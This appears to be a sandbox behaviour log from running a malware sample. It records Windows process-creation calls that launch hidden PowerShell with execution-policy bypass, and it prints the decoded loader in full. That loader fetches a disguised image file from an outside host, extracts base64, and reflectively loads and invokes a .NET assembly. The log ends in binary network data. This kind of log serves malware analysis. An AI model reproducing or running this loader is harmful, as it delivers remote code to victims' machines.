Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€WwBv€€GI€€agBl€€GM€€d€€Bb€€F0€€XQ€€g€€Cg€€JwBk€€Eg€€a€€€€w€€Ew€€bQBw€€Ho€€YQBI€€Fo€€bgBh€€Ec€€c€€€€0€€Fk€€agBR€€DI€€WgBY€€E4€€a€€BZ€€G0€€VgB1€€GE€€W€€Bw€€DE€€WQB5€€Dg€€M€€BO€€Ho€€RQB1€€E4€€egBN€€HU€€TgBE€€FU€€eQBM€€Go€€VQ€€0€€E0€€Uw€€4€€HY€€TwBu€€EI€€M€€Bk€€Ec€€Zw€€9€€Cc€€I€€€€s€€C€€€€JwBk€€GY€€Z€€Bm€€GQ€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZgBk€€GY€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZgBk€€GY€€Jw€€g€€Cw€€I€€€€n€€GQ€€YQBk€€HM€€YQ€€n€€C€€€€L€€€€g€€Cc€€Z€€Bl€€Cc€€I€€€€s€€C€€€€JwBj€€HU€€Jw€€p€€Ck€€';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000000000004d8
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€aQBt€€GE€€ZwBl€€HU€€c€€Bs€€G8€€YQBk€€C4€€aQBv€€C8€€aQBi€€C8€€ZQBr€€Fc€€ZwBI€€Fc€€agBQ€€DM€€YQBy€€HY€€VQBx€€Dc€€Xw€€x€€DY€€OQ€€4€€DE€€Ng€€2€€D€€€€OQ€€3€€C4€€agBw€€Gc€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€WwBv€€GI€€agBl€€GM€€d€€Bb€€F0€€XQ€€g€€Cg€€JwBk€€Eg€€a€€€€w€€Ew€€bQBw€€Ho€€YQBI€€Fo€€bgBh€€Ec€€c€€€€0€€Fk€€agBR€€DI€€WgBY€€E4€€a€€BZ€€G0€€VgB1€€GE€€W€€Bw€€DE€€WQB5€€Dg€€M€€BO€€Ho€€RQB1€€E4€€egBN€€HU€€TgBE€€FU€€eQBM€€Go€€VQ€€0€€E0€€Uw€€4€€HY€€TwBu€€EI€€M€€Bk€€Ec€€Zw€€9€€Cc€€I€€€€s€€C€€€€JwBk€€GY€€Z€€Bm€€GQ€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZgBk€€GY€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZgBk€€GY€€Jw€€g€€Cw€€I€€€€n€€GQ€€YQBk€€HM€€YQ€€n€€C€€€€L€€€€g€€Cc€€Z€€Bl€€Cc€€I€€€€s€€C€€€€JwBj€€HU€€Jw€€p€€Ck€€';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
filepath: powershell
1 1 0

CreateProcessInternalW

thread_identifier: 932
thread_handle: 0x000000000000033c
process_identifier: 2216
current_directory: C:\Users\test22\Desktop
filepath:
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ekWgHWjP3arvUq7_1698166097.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LmpzaHZnaGp4YjQ2ZXNhYmVuaXp1Yy80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x00000000000003c0
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received [
Data received We@»×>éÒ÷bžOhŸÂ:·ë”IçDOWNGRD =sá÷~èäžMRÔ <»¾é˜h k28ÐÖÀÿ 
Data received }
Data received K
Data received GAwWzûÎ=(Ý9_3%ÔKl~<¾óF#Ñ·ôÿeX6/õDƒy?Å ¾r']±¡½¢Fe2¨t·ˆKL¹"Õ·y\s=ðé”&£4ÊԆ¾“—€˜]#Añ…eL?âNb¾”ÜÂYÁˆ ôaXéÈiÏ1-®z#aöåRKC p‚ ùîcy©,‚<̳gח„݉ N©iÈýDWá‰mMšÅ›‚%¡%dܓÃأݨ<ÓÆY}vS™1).‚Þ<ÍxrìŠ4åv,§"LytcZô-é?}`%8M¼Ñ›ÊŸg¶LW7Eܑ)[ú’ßèO[‰}.}ÿB¤~vk^oˆ' ½#}y€6y´€_bÜ| k.˜”¿ƒ‹uÁ[Íæ¼A¶aMew©ŒãŸTÄé X{¸¨’é
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received 6ä¿"€¿@OÕA–[o¦nÙkß3-GÁŠÐ¤þ[HV‚*øttPÿ÷Ô7Ü
Data received p
Data received ”~( ¨ÞjMƒò× &åŠC|ìGYÒÓZƅ`+‡Þ“ËêYê¬ë»4ª ¡câQûw–ç-¯<ÛÅ;«ÖŒs¦×v‹ÊÀS#1‘s¬-I‚ÊÈmÏ}ÒÝ>˜%<Q¦‹ÝŽf¬ìи@»/¢IÚx_ü{E›GÔYêÁâº\ûX¾aatøTé§1gvû¸7\Coí¦¾輒ôJ¨+$E¿ZSŒûź0E£Úãî<ßG+f­¶-f–<¹gDbú¤)˗x%?çíïÎ%2ôÝn=ŸÌZÐü¿.~×GÕãR\4¾¢³tÁ rû~óÁÓ8CÑàeußÖà¨Ävõqw0s€*àj^÷ *mÏÀ5·L尿Žµ~ñ9öŒ”¹ÁR rˆNtɝyÆ'‚'×D“ÞZ­¥¸@ ÿƒ3t™¶žúŠ(؍ƒÂÆÓ°›+ŒðŠ—|nvf€: ‘’ØKûDA9*9”ϑQµ\8¹€ûú4j탻ŸØ,[àï^ápæè÷ì\>ÎXj|e^¯¢ü­­éÃdŒ´@ëhEZ÷*`©/vM±v'©aDü=œÏM7¥cÖé}Ò<{Ûü{Åꑉ·nÁ¡©” @Ðsä~\¿Å¦¤AüöŒyžnm Xÿäc V:ìwûàqà ³·š»<¼)ÞK^eúO¨õ)ŒÂÆo bzCUVqý° ëBÓí‚5%"ÆTœÈ T¢—]ç¢é"羏<“ïó¡X?BÜê*Œ8šCõ—^s 4Æf™U ¾†ÉÁg_¿Ø•¯SÉ4NŒg¼T*è…IUåÞH‡*þ«& ,Ÿˆ Êz*¼ A×ÉQS¼'mu-@0Þü»þne/NàU@ËAÕèl›þDFúƒSÄïJRj9ø{]Ȧ¤Æ¨(€¶X;c…¤¯Pá‡MOô*’€C•*lÁŸgÛèØÁô­®®<ÁEŸ‰ß–¡ñ?Œ·|¬†NÒ⊀ŸŠI3²l¤n‰lÈ6êVçÛf/ßS{B\Š§ØŸsN4’Mýüò¬‚ÈྌÆЁ6žøŽ"–¦}êƒd¦†A)D-#ŠŒÖ‰L¨ñn°l–%‡íít§rœ‚Ìés¹t Ñ.탔VãCˆæ……Ys×öˆ ´˜˜ãÕpe<+[Ö¦`ó‹«ͤT|8Êsï¡'šÑ 8eoÖ|H»û»Ûìÿ§lŸ†»ŠÖ|MÕ íz-gÏá1ö#5Ö¼G>ð|uˆ”ä™K*Ž‚r2.»+˜‘ÖaÚpí‰ö`'LMJ¹F룺¥=r†ÍÏ"s”/°§ÙíÍؘÖ3”Z½åm©$3{Gx°ž8:*÷Z 9œ>—RSž6>óÓvXP"µÈŸåFÕ·õ3D[&t·Ùþ¬ÑѹbÉþ!Ô9Üïдû_2u˜`½è|Žo‘]–öä1FJ/˜¿±Wµ+o©_B·M«g:9És¦DRÄڶƲZ JG4Ä5’‰¼é ´+øS$•Â4Ê·`Í×#Æ揩|«䐢NöúæÒ©:3JGElN.x£˜T4atP Vû³¤ €/B8¸±çÐ%ŸœCâå‹p+šZái$ç.ºb"¾Ó}ŠrRø;êm¾§%zo¶â=ú8Ȥè¢ÿb[„[£YxE‹Ž…K¾˜1j1r€É¿YڐŽsJ.Æ™l´9Þ§mtS6žÐ¸¬¥!ÑNŸÀÁ)ŒÏ€jþð¦xí¢¢IôhÍMºF÷âVÚ|§f.§{¤æØ~ûS‰
Data received m ƒ:1H&Æù4ÑoˆŒÏo¼ýÝ3Eҝ­Q ø8$)8òyÓQ™þrã£s«‡füz÷›‚eJ¬«U¶©/Á%mRÃ+a®ks³ñ›ÛۍÜÊ*òÓ¼€ÝAcjܞ"°—.®ë•Èr4±’žu¢ybÙ)µß¡ jÊ¿5Qs…7íÀôüø;šDýûÓ¾q_•„Æ‘¨79©×jÞuVòV¬;²T»r«y Çš—;u­î&?Šb]2 ûŒ}‡rFÓ>lb“õ>z´ÙÿŸMáoÓÅN 70šæ©ŽöŠ ãG–ñpyÐ!n* Â҈”ã©gJlÌÀ9í3>Õ|ív˜ùËXÊäF~+·oÁó.pröM[’s+~¯Ø­%d>Ÿ©ÄÇmbŽ$lG9Ç×ÓÙ@áöŸý`&}¿éâI{ Ó¥Èþ=Û[7$+òrº“lÅÖXå¥ËûÆ@ÝñÚ´?†ê؛ٮ9ïy$3Ò ž ×Ã䄕J;8Þ/çY.ѹ*<ü ˜yu*$º¢Ô8¤¾ž±B<sLÅï5W-ìÏ%RLÈkE¡Âm^î }š}sé/|µN¹S²(i7Ӓ“ñ$‡Ø7 !§´ÖQ‚¦)ýƒŽF¬¡_ýgªÇ!¹ñ»Í»žØÍ¢bð\T»A¾á…!œT±e‰|.â"%î´Të T¨ô¬ƒRÍÝÁ¬Mšk"ÓÈbgÙ"‚ÈÓß!iëÉ9”Åó<—{ ýåK£Õ`/<ÌÙOeC<1¨á¼ò¤z„p¨¬á¢†Ü/„ª¿êgu¦7\Ëǝ7=úm¡87jB”Ü0-Öy‹=ÚiüÊdº#Îè¦Ó% v¦onÈ8qd®†ê7Vd~(> û~Áã%Ö£”r 1¢¸[ä¹¥ìØUƇ¼@VÊ"%^4µÔëšÆK¦™©¯,o£x#‰­kžýIé­§ÿt®«ëì\•j¶^ŠaéF=¾cñöþÅËÓ\Žè2/¿ã˜%šØ*Å+ å,éiÀÀϓvŒ¹ŠHùº&ì­´=¹'£}Nzq_–zz/t4'°·fŒëQJЛû_ǧ jÖàÂ-j!$P?^Úíl¡ ¯$ì† LÝæéìGv1†×0K¢ósl&0åvU§Q*TÊú»ÎW*ŸdåTTyPµf”6zÉÃ( øÈT-¸ã#hptªÏ¢Bï'?2)èäršTY÷•Þx´#7ä]ýw—µ'c‹Ç“.îÄئ®WŒMË̹¦=0Vµ w[ÉQOmVõ ©ôw»ïØ6L%i sÝ\Ûfâ­G‰¹Ü‰võD–Ÿ9º¬;…A !Æ(LÙÊð@ô÷^Èp7âyÖK…£®•±*SgvA7YÅsaî*±ã÷@ô>U¥R!>Ó̐¼Òeä-ìp_›þDwúrÍ#úçg§®Ô&?š¡÷ 6ÍW­C\nÔ©µCߔˆËš@`ÏBéͼñfÔõQv?Zá¬ðó¬Ùzi9xVþ`ò3»#³ºäm+=™Õö.yBò§Ùê#s×ô¡£Ö)] P\ˆ6߆¢B„]p Ðª’´ì4,¯XË/FáörôœÊÔÆi@(§[ô%”§&…¯( ÷gy°¥Ù+ÕÊÎl° Ä#yJe N[ê°iÁf¼ë–lj9à¼$ʌu¦ÄʱÄßJ±»Ð3)їxÇF»_mˆRÎAN‘EŠÖ‰ìX7žä|׉yÇDæÍöÿ¯¾qQ=íx­ -×ñ=x¤þê˜Aô½Cx^*§¿ÝàR
Data received :jS!C_LK9¹WP±n²Ù¡È ¯OõÛ*YÔ©"‹ÜìÐfH× O݄bŸÓÊϒ˜À«ƒ;¡Òy:ŠD Ýx˜¾ÊXå ^þròÍñ%L°ûC,Nt-–%%z]­aIœ­?™·¶®—‰hå%V¦^õ4@€M«‘·r¢‚}­XÆ¡u7âÿ#HàÃÞú C·tº¨É‰¯ž?Êe. ㄶ«ÂºjG½\]z—•YÓ79i-,R9Î-‘U£ñÃ4å|@VÏaNtŽÃ±\h3g0HÑÿ”Á³ÿˆXL/Þbœš<Q½ô¤ÕI¬K‘D"“Qjß»r€S¢9^[Kñ© /SœA ËÕñQb$2.ønÛ#8C† CÁSÎLºþµ|¹KEãõN±Ÿ„ï#É[aϝÿüöúk?N’‚åÚ½ aÚå0³ì9Ï/ÄEµª0QP÷ã?}S N•³&¤=Üa ”¾ç@ÕY:ž/‰]g¡¦‚ÕûjN]Ž$—rO$ L1¸iÏ ÖûüÐÁ‡–M1·ElªñçCå?oØ(Ú·Ü캕?•šÛ…©úK;gI¥sëÙlQ[q¶ÐC­¶ÎEԕŸ!^­'½P#üKyè/‰!Ú®˜ž¼9 ¹>kè*óÀdè¯%™¼L§W\IÖ‹¾ÝYÐgÓ~Ü-Uú·×º\£8xÆg7jyÄÚz“„c°/­zâÌF ¨0ƒ šp,Ïℯ Øæ˜ƒ+GìË¾Ž%¹˜ љ ±óS$?¬9æoÙü®-3—99-?ÉvGµÌ/),cð¼ˆDÙ±B`{¬Vòk°™QÉë-túÑɅƒvÞe‡!èi_" ðzHaèu3ñ3Hf[`rªD´‚¤òϟê¹x+µM±?å|Ú ¦–àì·òêa„YÙ`F&ý5¶~mH}-±ÂÑN<çqÜ4¶ôsq$ ÷³påxö¶fž'Ø*.Aî¨ÈZ^|ðý¹É?Þµ%š÷M4MŒ‚ŸA‡åØ¢$ä˜?ÌÇ©Ñ`›)gʈW¨œPی‰õgùš>Õm43ÿœ¥Š¾°av&k•ü9…$ÿßa£\Nõ<_éú]ä˜ðË=7ÐR±µ@Ø«ŽÇayQ”‡‹n« aD…ásäÝH/ÿ¬ká%L‰ŠTuY Æævç°eæ#ßÏ~‚Ÿ=æi(¢ŵ:æíp2oîÑÝQÿ¯ô_GÙ¹)a–M˜u\=&­Çqfý‚·Þ=¤ÃÇFÓáékä•ÊW&‘kiäëîçl¿¸¹µï Y¦K#B'ýçpùC¬'X„4Ô<tÀú!t{2”ɪ“Œ·äD½ëÎηö ÊÙj0S£[9V—«JbÞ'.=!=NZˆ9Þî³EŸÆ1Q=l8͸… 2¨OAɅ§ä§í(?‚Ïۇñ+ˆ$ÁØC¨ãUÞÀc€ˆÜ{ !—j<1Ä0 ?YåJ)*g͚­Ér”„ª…Ñý·“Èxq6€+$ŒÙèkî .vRܐ;qŸCù­FíBÿØE‡ŽÝÙnºåþýBýl%S#häþ±‘›¢ž÷NîJCᑊÐwiÖ|w2i7ι?.­þI÷ý¼žf? ãM"^7©²†×9ýf =ͯÿ8Oö£‡~+õ0F_oŽFUÀ²åŸP#¬Ÿk)@F~:owÎ2YJïJåÍl?÷pÿ šXæa`5¶è’ëUK/âÆpǐà»oØÏDVy˜¿AQÑÔ»M³Þæhk¿¶a&aK(!Ë–µ
Data received WWLzé¦'ˆfŸH&tSJBòÈ.á~BT˜e¼3BSŽR«ÆÆÜk-ÿ/³.Êrkۏ§×aÀÒɺ̅b üsã=ûÀî֛ÄãÞg.`Í=Ž<x¼,©_€X5ó*²Y'ZQÁyáÑüBI‰³‰-Áÿ·°€Ý¥é߅ºWvMrœÛ#⠐´ÜÁŽ×ðsjm¢$8«RŠ¬VXt̙o¯˜ #%ïq±©‰#E• Zëɨ Ç<%Kõ/­I&4í›ñɲgÿD’)+÷ºœ™ÖPe€ãˆ`ÿÊÏHÄ£Sw¦l.­8ô䃆§©‘x®ôJ-ù¤ÌŠ”þ¿«Ì­øC¯"r‚µTaȯãÄ} "“›¹;ÄÿJ¢”¥Móz]žJ´Ì.ð༻æSˍêϤP”+ÿ,^ԓ½NQLV“#(”¤&©þëÿ±ŽsíäIFà%é¦rŸ6¶4?²tdS£À!Fi¸HU¬~ê[’Z¡%gHéå-ÅLIèék¿¹ñ;Ë´FRqô¤a k!ª ˜dU9¿çtG[ɟúHM Vapeµ+ü§¤#¾€…Ó°f­?¿¦ÒSÒám9„F4=´Á Æ"NâaÕVÎB†&ÓVÞX˜„Ëç÷‚ƒ3Úé’K  m$ŒØ(…ƒO­z«ÝB|ƒ7uîß6$Â5 ­YòIè? °Ø±ì†ÑY”è7w–›5:¾rXévÏõ}†0MVf ¼u>փì}²piHß1úÚïV-’טE»O—Þ!É<^ÂÎm™gë("q£²óWë¥DÝ~8"Q˜† W¼ÌÖM;†!؝_{D€"QCœ¾WãËäÃÕQ+óqý¬Xnà›œªjY…ØÆ¿·Y!Ê»Iq•ÚÅ_þyšú’㉁@­ú·&ïú¨å—gCY0ærY4»÷«çތpõo’Ùþq”FVkW›9nnê¼â…QÝ݋sîuF-›ÊÊPmKÒâ³ØKBô3æ£V¡€]Êm ‡ù¶½oru•=Å  šL”ÆÌB˛œ¿N‡ÛEjü~m-^Œ¡ÒþªŽôÿªbgƒ´Ÿ¬Ðޅ–ó¾±ý«Cꠓ£6~K¶5Z¼¼ZòE™‹ø÷´¨aè-ϜõPmĹÅ÷å#^7èyÃöOÖªô{ý•1Ê{E¨¯ió«É1}M ½Û‚¬½-<M?RkíCº³T°é.¸ïƒÿü¸B:8 ‡æ*KZt=º 1 |çöR™É΢‡ ÂIí±>[ÊqZ–X™-ˆ°BhÆ?í¹Oª<äæOž8-äÁOE'õú9Ý}~ex‘²éMÒ¿ƒCJzUìå{ÝÊ·0¨çú«c˓ˆÇývgß¹yìè 3ÔQÚ"ñ“jÓùF¨NÙ£”x7VN>”ò6~¹xï|>½R$˜_‡º{„vüÐCº\b靈š,Æٌ̧2×ð{J<FùÜúþkê×vä§:ëÐ ¦î–×Sá;ruEЧEó|Ô7ô$ ÓöÇwßÃu*ZçxSØÿ"F2”qÐþÓG¯ÄU©–Ø@•´ óù3êkíj{ìڛ]%µXÀ×V‰9ûEôó{ØE&\ï,ÿ®b;ƒn ú߀kÃ_tü›Ó%/Àž×|þPdíìhÏ®¶”xPa©8åêŽT[äün]Àü»ÞMî},û)Ã9$uÖãÉ É$·Ցæ4étHÅzj÷>¢2`´©þT6“=3õÏñqWÞ:#—iKø0—8sîv=‚j"æ’Í:úæܪaoùV$·;F
Data received MùٛоÿL 2ß8²ë'Ü)\ªƒß†ä?㫓Âï œbT×Ï \îhÁ›oö¢4B¾Ó€`}ïqp…Fñ=¿ü¼d2¡ i^{›Žžl3RF`5ã‰Í8>švoMÊï[õhF _6Œr5àµ~ïë¤Î’ÓíºE‹v,Cv_:!GlªÝlùÇáÄQbåñ{CýI¿ñò¶w«`g3ˆi)D]eÒ©Â}kšÃ%¢qìcñy† õí˜Ó¹ëM†)A5]î«oCâµh|Þ¾XO˜Ý| ³<˜}"urt~ò  õÁÀ1“ kòmn{M%ÇÞÅÉ9Ðý¢}“œ¹ï ½Ž»'3$ê÷LjÛÌ&ÙõBa×c6¤¤E×m”6Wšì…/“[àéÓK=áõ˜ å¹-`Ÿ²mR›óï6fP€Ö´¡³âÇ zEÃBp­=]³yH*Tã^5AWčc%l?»¼•ÅÚv"XU–9ØoH:*€'G& B…?wøcRè•ÄÎëT}Gm˚ -ùG *‚ƒÌ&R×ÐBõË4fª²6GAe’~Qôª2RCdnÔó1™ú¶ïëfñ½I»(ƒ‘ò¹jfLяåiçɅ@€¼Âl¶QÔ¦€<ÿ¢ÁàtäÞ1ï[rLáËÄd½»s7.àIϹ™*uiŸZþЎù—žShx³Ýg1@eëÑw„(n¥¬Vó"ÚdÐOÿœDK³m}Ü`ñÁüF”dÿ:iJÁ}כ—¹pX[sœÙpÊ×Þ©Ù%LCš!Õ`+¹Mô//*–ï7¶æp¢#ÕÖjüöËq…]I@ƒMe7àH¨µŒ`À–ͼUrA¨»¯ 0fJ™ä—d»T…s Nz4u fs¿~iõ²p;ÕµÛ2!^†Œów¯ã` /Å)*—ˆP¿NËìÈÞ#Ïw^”xRB`ǚ¶{Ü6­ƒâñÉi'$Œ¹*:ĦÀ?yº%¯†DM<Q)ÿüÕú² Ç6ÏÐ:_‰{:Xfñ(Iì®þàCrS« 